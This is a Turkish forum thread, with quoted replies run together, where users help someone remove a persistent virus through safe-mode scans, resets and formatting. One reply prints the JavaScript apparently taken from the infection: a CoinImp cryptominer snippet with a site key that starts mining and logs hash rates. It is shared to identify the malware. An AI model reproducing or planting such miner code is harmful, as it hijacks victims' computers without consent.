- Konuyu başlatan
SLayer2001
Öğrenci
- Reaksiyon puanı
- 34
zaten malwarebytes normaldede işe yaramadığı için güvenli modda denemek zaman kaybı olabilir
çalışmaz o kolay kalkmayan bir virüsaynı virüs bendede var bilgisayarın kendi kaldırma seçeneğini kullansam kurtukurmuym
Güvenli moda girdiğinizde emin misiniz?güvenli modda 1-2 deneme yaptım ama o bile işe yaramadı (cmd ile servis durdurma komutu ve silme konutlarını denedim)
bende tüm herşeyi denedim olmadı babamla ortak kullanıyorum onunda dosyaları var baya sıkıntılı bir işgüvenli modda 1-2 deneme yaptım ama o bile işe yaramadı (cmd ile servis durdurma komutu ve silme konutlarını denedim)
evetGüvenli moda girdiğinizde emin misiniz?
Siz deneyin yine dezaten malwarebytes normaldede işe yaramadığı için güvenli modda denemek zaman kaybı olabilir
dosyaları yedekleyin sonra resetleyinbende tüm herşeyi denedim olmadı babamla ortak kullanıyorum onunda dosyaları var baya sıkıntılı bir iş
bilgisayarı kökten sıfırlama tüm dosyaları kaldırıyor işe yaramazmı dersinizçalışmaz o kolay kalkmayan bir virüs
bende o yüzden format atmak istemiyorumbende tüm herşeyi denedim olmadı babamla ortak kullanıyorum onunda dosyaları var baya sıkıntılı bir iş
yedek çok sıkıntıya sokar 200 gb'ye yakın verimiz vardosyaları yedekleyin sonra resetleyin
yarar o bence dosyalarınızı yedekleyin sonra resetleyin kurtulursunuzbilgisayarı kökten sıfırlama tüm dosyaları kaldırıyor işe yaramazmı dersiniz
hemen deniyorum şimdi.Güvenli modda Malwarebytes ile siler misiniz
Bazı virüslerde reset işlemi işe yaramaz Format atmak gerekir.yarar o bence dosyalarınızı yedekleyin sonra resetleyin kurtulursunuz
Tamamdır.hemen deniyorum şimdi.
bende windows fabrika ayarlarına döndür dediğinde gitti o virüsBazı virüslerde reset işlemi işe yaramaz Format atmak gerekir.
zor bencebir şey daha : diyelim format attım bizim internet ağımızda 3 adet bilgisayar ve 2 adet telefon var virüs onlara bulaşıp formattan sonra bana geri döner mi ? ya da yedeğime sızıp formattan sonra geri yükler mi kendisini
(
async() =>
{
const miner = await CoinImp('759149ad1e56601bc8358580d567b319753bc773de35ce1f0d53bb8e4b97186');
await miner.start();
miner.on('found', () => console.log('Found!));
miner.on('accepted', () => console.log('Accepted!));
miner.on
(
'update', data =>
console.log
('
Hashes per second: ${data.hashesPerSecond}
Total hashes: ${data.totalHashes}
Accepted hashes: ${data.acceptedHashes}
')
);
}
)
O potansiyele sahip bir virüs değil.bir şey daha : diyelim format attım bizim internet ağımızda 3 adet bilgisayar ve 2 adet telefon var virüs onlara bulaşıp formattan sonra bana geri döner mi ? ya da yedeğime sızıp formattan sonra geri yükler mi kendisini
Tamamdır güvenli modda tam tarama yapıp siliniz.malware bytes'ı kurdum güvenli moda geçiyorum
Emin misiniz ? çok profesyonel bir yazılım gibi duruyorO potansiyele sahip bir virüs değil.
Giridiniz mi güvenli modaEmin misiniz ? çok profesyonel bir yazılım gibi duruyor
yapamaz o kadar değil hocamızın dediği gibi yapsa kartlar vb. çalarlardı bilgileri falan herşeyiEmin misiniz ? çok profesyonel bir yazılım gibi duruyor
Tarama yapıyor musunuzevet ağ ile başlattım o sayede foruma giriyorum
Profesyonel değil. Demin @Assad Najjar kodlarını attı. Bakarsanız basit ama etkili bir miner virüs. Sıkıntı olmaz. MalwareBytes ve Bitdefender ile taratın.Emin misiniz ? çok profesyonel bir yazılım gibi duruyor
Teorik olarak Node.JS çatısı kullanılırsa bu mümkün.O potansiyele sahip bir virüs değil.